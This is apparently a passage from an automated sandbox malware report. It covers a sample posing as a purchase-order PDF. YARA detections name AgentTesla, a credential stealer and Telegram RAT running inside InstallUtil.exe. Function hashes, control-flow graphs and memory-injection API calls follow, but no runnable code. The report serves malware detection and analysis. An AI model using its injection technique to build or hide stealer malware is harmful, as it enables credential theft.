                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1968221144.0000000002CB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.1995281539.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:00:22:25
                                          Start date:04/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                          Imagebase:0x540000
                                          File size:42'064 bytes
                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2973425919.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2973425919.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.2973425919.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2973425919.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:moderate
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:14.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:8.8%
                                            Total number of Nodes:34
                                            Total number of Limit Nodes:0
                                            execution_graph 53949 621d420 53950 621d46f NtProtectVirtualMemory 53949->53950 53952 621d4e7 53950->53952 53953 1181b50 53954 1181b6d 53953->53954 53955 1181b7d 53954->53955 53957 1184afa 53954->53957 53958 1187952 53957->53958 53962 5ee1802 53958->53962 53967 5ee1810 53958->53967 53959 11828bd 53963 5ee1810 53962->53963 53972 5ee1850 53963->53972 53977 5ee1861 53963->53977 53964 5ee183d 53964->53959 53968 5ee1825 53967->53968 53970 5ee1850 2 API calls 53968->53970 53971 5ee1861 2 API calls 53968->53971 53969 5ee183d 53969->53959 53970->53969 53971->53969 53974 5ee1865 53972->53974 53973 5ee1943 53973->53964 53982 5ee1968 53974->53982 53986 5ee1960 53974->53986 53979 5ee1865 53977->53979 53978 5ee1943 53978->53964 53980 5ee1968 VirtualAlloc 53979->53980 53981 5ee1960 VirtualAlloc 53979->53981 53980->53978 53981->53978 53983 5ee19ac VirtualAlloc 53982->53983 53985 5ee1a19 53983->53985 53985->53973 53987 5ee19ac VirtualAlloc 53986->53987 53989 5ee1a19 53987->53989 53989->53973 53990 5ee07a0 53991 5ee07e9 VirtualProtect 53990->53991 53993 5ee0856 53991->53993

                                            Executed Functions

                                            Function 05F20130 Relevance: 16.1, Strings: 12, Instructions: 1144COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-312445597
                                            • Opcode ID: da56c8efc36fc337186aa8f746a27d961847ead486113db07fdb8a5d6cca3804
                                            • Instruction ID: 47725244c8d40cae459a33f652e4b34941d49d232ecdf882410fbd06a6e5de2a
                                            • Opcode Fuzzy Hash: da56c8efc36fc337186aa8f746a27d961847ead486113db07fdb8a5d6cca3804
                                            • Instruction Fuzzy Hash: 38B22975A00228CFDB14DFA4C998BADB7B6BF48700F148599E506AB3A5DB74EC81CF50
                                            Function 05F20467 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                            • API String ID: 0-2546334966
                                            • Opcode ID: 8ad6930b9b73207f85ec8d35df5bbd4e12e9d5df713a471900f94dd7293cdb97
                                            • Instruction ID: 6cdb455b44b415f50f1ff3a85ef88d0d20f6f3dc7ff5546eca4ecb568f70f8eb
                                            • Opcode Fuzzy Hash: 8ad6930b9b73207f85ec8d35df5bbd4e12e9d5df713a471900f94dd7293cdb97
                                            • Instruction Fuzzy Hash: 8A223B75A01228CFDB24DFA4C998BADB7B6FF48304F108099E509AB3A5DB749D81CF50
                                            Function 05EE5390 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 632 5ee5390-5ee53b1 633 5ee53b8-5ee549f 632->633 634 5ee53b3 632->634 636 5ee54a5-5ee55e6 633->636 637 5ee5ba1-5ee5bc9 633->637 634->633 681 5ee55ec-5ee5647 636->681 682 5ee5b6a-5ee5b94 636->682 640 5ee62cf-5ee62d8 637->640 641 5ee62de-5ee62f5 640->641 642 5ee5bd7-5ee5be1 640->642 644 5ee5be8-5ee5cdc 642->644 645 5ee5be3 642->645 663 5ee5cde-5ee5cea 644->663 664 5ee5d06 644->664 645->644 666 5ee5cec-5ee5cf2 663->666 667 5ee5cf4-5ee5cfa 663->667 668 5ee5d0c-5ee5d2c 664->668 669 5ee5d04 666->669 667->669 673 5ee5d2e-5ee5d87 668->673 674 5ee5d8c-5ee5e0c 668->674 669->668 687 5ee62cc 673->687 695 5ee5e0e-5ee5e61 674->695 696 5ee5e63-5ee5ea6 674->696 688 5ee564c-5ee5657 681->688 689 5ee5649 681->689 693 5ee5b9e-5ee5b9f 682->693 694 5ee5b96 682->694 687->640 692 5ee5a7f-5ee5a85 688->692 689->688 697 5ee565c-5ee567a 692->697 698 5ee5a8b-5ee5b07 692->698 693->637 694->693 724 5ee5eb1-5ee5eba 695->724 696->724 701 5ee567c-5ee5680 697->701 702 5ee56d1-5ee56e6 697->702 740 5ee5b54-5ee5b5a 698->740 701->702 707 5ee5682-5ee568d 701->707 705 5ee56ed-5ee5703 702->705 706 5ee56e8 702->706 710 5ee570a-5ee5721 705->710 711 5ee5705 705->711 706->705 712 5ee56c3-5ee56c9 707->712 716 5ee5728-5ee573e 710->716 717 5ee5723 710->717 711->710 713 5ee568f-5ee5693 712->713 714 5ee56cb-5ee56cc 712->714 718 5ee5699-5ee56b1 713->718 719 5ee5695 713->719 723 5ee574f-5ee57ba 714->723 720 5ee5745-5ee574c 716->720 721 5ee5740 716->721 717->716 725 5ee56b8-5ee56c0 718->725 726 5ee56b3 718->726 719->718 720->723 721->720 727 5ee57ce-5ee5983 723->727 728 5ee57bc-5ee57c8 723->728 730 5ee5f1a-5ee5f29 724->730 725->712 726->725 738 5ee59e7-5ee59fc 727->738 739 5ee5985-5ee5989 727->739 728->727 731 5ee5ebc-5ee5ee4 730->731 732 5ee5f2b-5ee5fb3 730->732 734 5ee5eeb-5ee5f14 731->734 735 5ee5ee6 731->735 768 5ee612c-5ee6138 732->768 734->730 735->734 742 5ee59fe 738->742 743 5ee5a03-5ee5a24 738->743 739->738 744 5ee598b-5ee599a 739->744 745 5ee5b5c-5ee5b62 740->745 746 5ee5b09-5ee5b51 740->746 742->743 747 5ee5a2b-5ee5a4a 743->747 748 5ee5a26 743->748 750 5ee59d9-5ee59df 744->750 745->682 746->740 754 5ee5a4c 747->754 755 5ee5a51-5ee5a71 747->755 748->747 752 5ee599c-5ee59a0 750->752 753 5ee59e1-5ee59e2 750->753 759 5ee59aa-5ee59cb 752->759 760 5ee59a2-5ee59a6 752->760 757 5ee5a7c 753->757 754->755 761 5ee5a78 755->761 762 5ee5a73 755->762 757->692 763 5ee59cd 759->763 764 5ee59d2-5ee59d6 759->764 760->759 761->757 762->761 763->764 764->750 769 5ee613e-5ee6199 768->769 770 5ee5fb8-5ee5fc1 768->770 785 5ee619b-5ee61ce 769->785 786 5ee61d0-5ee61fa 769->786 771 5ee5fca-5ee6120 770->771 772 5ee5fc3 770->772 789 5ee6126 771->789 772->771 775 5ee609f-5ee60df 772->775 776 5ee605a-5ee609a 772->776 777 5ee6015-5ee6055 772->777 778 5ee5fd0-5ee6010 772->778 775->789 776->789 777->789 778->789 794 5ee6203-5ee6296 785->794 786->794 789->768 798 5ee629d-5ee62bd 794->798 798->687
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *?/*$TJcq$Te^q$pbq$xbaq
                                            • API String ID: 0-2039389285
                                            • Opcode ID: 79bbeef4c261ff4704c7e9f0a377c2e17fc6f0b85cd091353c9001a2e53e3f2f
                                            • Instruction ID: 3d957be1cfd4bb6452573f43e6f15f527fed6ed6093fc216a033068d872f8e1b
                                            • Opcode Fuzzy Hash: 79bbeef4c261ff4704c7e9f0a377c2e17fc6f0b85cd091353c9001a2e53e3f2f
                                            • Instruction Fuzzy Hash: 36A2B475A00228CFDB65CF69C984ADDBBB2BF89304F1581E9D549AB325DB319E81CF40
                                            Function 0621A638 Relevance: 3.0, Strings: 2, Instructions: 542COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1422 621a638-621a659 1423 621a660-621a6f8 call 621af68 1422->1423 1424 621a65b 1422->1424 1428 621a6fe-621a735 1423->1428 1424->1423 1430 621a744 1428->1430 1431 621a737-621a742 1428->1431 1432 621a74e-621a820 1430->1432 1431->1432 1441 621a832-621a85d 1432->1441 1442 621a822-621a828 1432->1442 1443 621aeca-621aee6 1441->1443 1442->1441 1444 621a862-621a98b 1443->1444 1445 621aeec-621af07 1443->1445 1454 621a99d-621aaec 1444->1454 1455 621a98d-621a993 1444->1455 1463 621ab45-621ab4c 1454->1463 1464 621aaee-621aaf2 1454->1464 1455->1454 1465 621acf7-621ad13 1463->1465 1466 621aaf4-621aaf5 1464->1466 1467 621aafa-621ab40 1464->1467 1468 621ab51-621ac3f 1465->1468 1469 621ad19-621ad3d 1465->1469 1470 621ad87-621add6 1466->1470 1467->1470 1494 621acf3-621acf4 1468->1494 1495 621ac45-621acf0 1468->1495 1476 621ad84-621ad85 1469->1476 1477 621ad3f-621ad81 1469->1477 1484 621ade8-621ae33 1470->1484 1485 621add8-621adde 1470->1485 1476->1470 1477->1476 1487 621ae35-621aeab 1484->1487 1488 621aeac-621aec7 1484->1488 1485->1484 1487->1488 1488->1443 1494->1465 1495->1494
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fcq$8
                                            • API String ID: 0-89531850
                                            • Opcode ID: 1969bd2e5b48d9d24a06f8ac3cd0cdf881c0a770abe10fa700f509489b59a129
                                            • Instruction ID: 89c506d94eaeea4881fafed46a8656dda002ca03643e9b23b321412d37d5f71f
                                            • Opcode Fuzzy Hash: 1969bd2e5b48d9d24a06f8ac3cd0cdf881c0a770abe10fa700f509489b59a129
                                            • Instruction Fuzzy Hash: 4B42D575D016298FDB64DF69C850AD9B7B1BF89310F1486EAD80DA7251EB30AE85CF80
                                            Function 0621A58D Relevance: 2.7, Strings: 2, Instructions: 245COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1859 621a58d-621a5a1 1861 621a5c3-621a5de 1859->1861 1862 621a5a3-621a5c1 1859->1862 1867 621a5e3-621a5f1 1861->1867 1862->1861 1862->1867 1870 621a613-621a630 1867->1870 1871 621a5f3-621a5f6 1867->1871 1872 621a632-621a659 1870->1872 1873 621a5fd-621a610 1870->1873 1871->1873 1876 621a660-621a6f8 call 621af68 1872->1876 1877 621a65b 1872->1877 1873->1870 1881 621a6fe-621a735 1876->1881 1877->1876 1883 621a744 1881->1883 1884 621a737-621a742 1881->1884 1885 621a74e-621a820 1883->1885 1884->1885 1894 621a832-621a85d 1885->1894 1895 621a822-621a828 1885->1895 1896 621aeca-621aee6 1894->1896 1895->1894 1897 621a862-621a98b 1896->1897 1898 621aeec-621af07 1896->1898 1907 621a99d-621aaec 1897->1907 1908 621a98d-621a993 1897->1908 1916 621ab45-621ab4c 1907->1916 1917 621aaee-621aaf2 1907->1917 1908->1907 1918 621acf7-621ad13 1916->1918 1919 621aaf4-621aaf5 1917->1919 1920 621aafa-621ab40 1917->1920 1921 621ab51-621ac3f 1918->1921 1922 621ad19-621ad3d 1918->1922 1923 621ad87-621add6 1919->1923 1920->1923 1947 621acf3-621acf4 1921->1947 1948 621ac45-621acf0 1921->1948 1929 621ad84-621ad85 1922->1929 1930 621ad3f-621ad81 1922->1930 1937 621ade8-621ae33 1923->1937 1938 621add8-621adde 1923->1938 1929->1923 1930->1929 1940 621ae35-621aeab 1937->1940 1941 621aeac-621aec7 1937->1941 1938->1937 1940->1941 1941->1896 1947->1918 1948->1947
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fcq$h
                                            • API String ID: 0-1849521214
                                            • Opcode ID: ee9264957736f4bd955a3f08abadbdd36f72cca419a8b3ac9db15cbe17517c9a
                                            • Instruction ID: a181f8406d0cc72170d777f1991782f757370e67c99890ce362b8337743c1b2f
                                            • Opcode Fuzzy Hash: ee9264957736f4bd955a3f08abadbdd36f72cca419a8b3ac9db15cbe17517c9a
                                            • Instruction Fuzzy Hash: 9F918271D0A3699FDB56CF69CC506D9BBB2AF86300F0481E6D44CAB252DB305E89CF91
                                            Function 05EE7A78 Relevance: 2.3, Strings: 1, Instructions: 1091COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2
                                            • API String ID: 0-450215437
                                            • Opcode ID: 91279f726c57be1a77cfd25d48eb928d74582a80915f6d4d28829c837ad65a96
                                            • Instruction ID: 11f021fef88667beea7fb1065ecff6764b5ac14724871a5583bb2e9971da54a4
                                            • Opcode Fuzzy Hash: 91279f726c57be1a77cfd25d48eb928d74582a80915f6d4d28829c837ad65a96
                                            • Instruction Fuzzy Hash: 0BC2D0B4A012288FDB65DF28C984BD9BBB6FF89304F1081E9D549AB355DB309E85CF44
                                            Function 05F5C3F0 Relevance: 1.6, Strings: 1, Instructions: 364COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: e2627a1c95272303e273781b6d3f958654f17dd6d12bc3ae3545687df8ab1c27
                                            • Instruction ID: d10d03d4a0b64f3ebfdca5f62370ac9306ebfd9cdb0ea1f980d6a55d6d46eebe
                                            • Opcode Fuzzy Hash: e2627a1c95272303e273781b6d3f958654f17dd6d12bc3ae3545687df8ab1c27
                                            • Instruction Fuzzy Hash: 56F1E274E05318CFDB24DF69D894BADBBF6BB89314F1080AAD90AA7251DB745D85CF00
                                            Function 0621D41F Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0621D4D5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: aed722aebf3cdcaec445e4ead5568e8d8c1015a88bf627ee99e65db2a40ae738
                                            • Instruction ID: 375151aa6b1fd5b70f31df63a64e2b03ec68c4255126a25038cf69112fe700c6
                                            • Opcode Fuzzy Hash: aed722aebf3cdcaec445e4ead5568e8d8c1015a88bf627ee99e65db2a40ae738
                                            • Instruction Fuzzy Hash: 554188B4D042589FCF10CFAAD980ADEFBB1BB59310F10942AE819B7200D735A945CF64
                                            Function 05F5C3E0 Relevance: 1.6, Strings: 1, Instructions: 355COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: 79375572137b4e1bd4b74a9f33c176c7f30907deda74fb7c591f829e8c501817
                                            • Instruction ID: 6ccf943ddfff0f81f2042cd382c4aed85a4d6507630feb16e5a7c44d716422f6
                                            • Opcode Fuzzy Hash: 79375572137b4e1bd4b74a9f33c176c7f30907deda74fb7c591f829e8c501817
                                            • Instruction Fuzzy Hash: 40F1F474E05318CFDB24DF69D894BADBBF2BB89314F1080AAD90AA7255DB745E85CF00
                                            Function 0621D420 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0621D4D5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID:
                                            • API String ID: 2706961497-0
                                            • Opcode ID: 466d856f229cd4e3ac178f4c643973e040a843070a936f6655ed90273a736e6d
                                            • Instruction ID: b849f44f6e89e924df5154e047a0bff7e91ad9324a857dec2084510c7255a8bb
                                            • Opcode Fuzzy Hash: 466d856f229cd4e3ac178f4c643973e040a843070a936f6655ed90273a736e6d
                                            • Instruction Fuzzy Hash: 344186B4D042589FCF10CFAAD980ADEFBB1BB59310F10A42AE819B7200D735A945CF68
                                            Function 0621EDA0 Relevance: 1.6, APIs: 1, Instructions: 89nativethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtResumeThread.NTDLL(?,?), ref: 0621EE36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: d42882dcf3040b9c70481c56e03d689df18dbda0809fa642699385f0159721a9
                                            • Instruction ID: 8bac17ab5e3d9c71c9a7882c5312132df92f489a4dbc9aecfae8c94ab8f084a6
                                            • Opcode Fuzzy Hash: d42882dcf3040b9c70481c56e03d689df18dbda0809fa642699385f0159721a9
                                            • Instruction Fuzzy Hash: EE31DBB5D052189FCB10CFA9D884ADEFBF1BB59320F10942AE854B7240D774AA45CF94
                                            Function 0621EDA8 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtResumeThread.NTDLL(?,?), ref: 0621EE36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: e33a0945daa45bcfba3e4c59f108c2bb2474b51f969aaeb1ec4273933688a033
                                            • Instruction ID: 4686178ff9624f0278a33aafc86e2442eea6f3c9ccfc7b368369b2a0608c722e
                                            • Opcode Fuzzy Hash: e33a0945daa45bcfba3e4c59f108c2bb2474b51f969aaeb1ec4273933688a033
                                            • Instruction Fuzzy Hash: 2131AAB4D152189FCB10CFA9D984A9EFBF1FB59320F10942AE819B7340C775A945CF94
                                            Function 06215EF8 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: 24b54bce165025bbb2cb1331861f563a5f31933922af7620f9db91acb0c1f9ba
                                            • Instruction ID: 4109f7faa7ff70f704e886df9bd4a1fd58dd98d627fe3db5e90e8b6f32b88692
                                            • Opcode Fuzzy Hash: 24b54bce165025bbb2cb1331861f563a5f31933922af7620f9db91acb0c1f9ba
                                            • Instruction Fuzzy Hash: 74C13C74D19219CFEB64CF69D848B9DBBF2FF99304F1080AAD809AB251DB754985CF40
                                            Function 06215F08 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q
                                            • API String ID: 0-2549759414
                                            • Opcode ID: 4a3df371bfd1e94ba6b57a9a5b34869bf45a6706b99e2025e55a2305dc51ee9c
                                            • Instruction ID: 3a569146fb79e973e0cf84d1c5e7be369d58ca8e2cb51872c7e1f76b8bc1a340
                                            • Opcode Fuzzy Hash: 4a3df371bfd1e94ba6b57a9a5b34869bf45a6706b99e2025e55a2305dc51ee9c
                                            • Instruction Fuzzy Hash: 0BC14C74D29219CFEB64CFA9D44879DBBF2FF99304F2080A9D809AB251DB755984CF40
                                            Function 05F5CED8 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: cfdb57bff4b2fa2f36cce859e75b178fdfcf5c5206e19fdfc36f35bd1d166400
                                            • Instruction ID: bb704ccc8727bb86298e72858fb1c76dc327f8c4d79699468d28dbc380065664
                                            • Opcode Fuzzy Hash: cfdb57bff4b2fa2f36cce859e75b178fdfcf5c5206e19fdfc36f35bd1d166400
                                            • Instruction Fuzzy Hash: 0DB13A74D06208CFEB14CF69C984BADBBF2FB89314F5090A9D909E7255D7799A85CF00
                                            Function 05F5CEC8 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: 704baeb607490471b0d25a214ce94245d9c4873813cfd5d3ec58ddb0b3894559
                                            • Instruction ID: e47502ebea75ae7c1814bed1fdca185863e4dab2613d6237459f47d4431464bf
                                            • Opcode Fuzzy Hash: 704baeb607490471b0d25a214ce94245d9c4873813cfd5d3ec58ddb0b3894559
                                            • Instruction Fuzzy Hash: 09B1F974D02208CFEB14CFA9C984B9DBBF2BB89314F5090A9D909E7255D7799A85CF10
                                            Function 05F53A80 Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: c90e383d520c057063ccf92007c11e12042a220498475df572585bf56c4d1321
                                            • Instruction ID: 996a838cd9ff8072469d0fb707ffaba980c33710e44b9433f064f229dd8b4003
                                            • Opcode Fuzzy Hash: c90e383d520c057063ccf92007c11e12042a220498475df572585bf56c4d1321
                                            • Instruction Fuzzy Hash: 57B11774E05208CFDB14DFA9C884BADBBF6FF89354F20846AD909A7295DB745985CF00
                                            Function 05F53A71 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te^q
                                            • API String ID: 0-671973202
                                            • Opcode ID: 66f85c931fb88b718af8c4d1e80e0c76a1cc2ff70a0d0ee23e9b21f4fbdb2866
                                            • Instruction ID: 42bc16c2f85a63ce87babecc900961044c18b902306751817d224893ef7b1cc7
                                            • Opcode Fuzzy Hash: 66f85c931fb88b718af8c4d1e80e0c76a1cc2ff70a0d0ee23e9b21f4fbdb2866
                                            • Instruction Fuzzy Hash: F1A11874E05208CFDB14DFA9C584BADBBF6FF88314F20846AD909A7295DB755985CF00
                                            Function 05EE8E84 Relevance: .5, Instructions: 471COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d237993e09bafb8e7fad060246ae2b6b14d99f2f71d2c3dde4465469d5525e3f
                                            • Instruction ID: 0e25c289664be9c173bd0adbfdef46e25e735c5648e342e1227d973f2a64e274
                                            • Opcode Fuzzy Hash: d237993e09bafb8e7fad060246ae2b6b14d99f2f71d2c3dde4465469d5525e3f
